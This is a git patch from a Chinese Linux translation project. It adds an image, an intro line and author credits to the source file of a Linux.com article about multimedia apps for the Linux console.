Subject: [PATCH 322/371] add done: 20180111 Multimedia Apps for the Linux
Console.md
---
.../20180111 Multimedia Apps for the Linux Console.md | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/sources/tech/20180111 Multimedia Apps for the Linux Console.md b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
index 3f3849db6c..1b9171a795 100644
--- a/sources/tech/20180111 Multimedia Apps for the Linux Console.md
+++ b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
@@ -1,5 +1,9 @@
Multimedia Apps for the Linux Console
======
+
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/multimedia.jpg?itok=v-XrnKRB)
+The Linux console supports multimedia, so you can enjoy music, movies, photos, and even read PDF files.
+
When last we met, we learned that the Linux console supports multimedia. Yes, really! You can enjoy music, movies, photos, and even read PDF files without being in an X session with MPlayer, fbi, and fbgs. And, as a bonus, you can enjoy a Matrix-style screensaver for the console, CMatrix.
You will probably have make some tweaks to your system to make this work. The examples used here are for Ubuntu Linux 16.04.
@@ -93,13 +97,13 @@ Learn more about Linux through the free ["Introduction to Linux" ][4]course from
via: https://www.linux.com/learn/intro-to-linux/2018/1/multimedia-apps-linux-console
-作者:[][a]
+作者:[Carla Schroder][a]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-[a]:
+[a]:https://www.linux.com/users/cschroder
[1]:https://www.mjmwired.net/kernel/Documentation/fb/fbcon.txt
[2]:https://www.kraxel.org/blog/linux/fbida/
[3]:http://www.asty.org/cmatrix/
From 182b992e6a523232c58e0b4e78c74e13176d56a8 Mon Sep 17 00:00:00 2001
From: darksun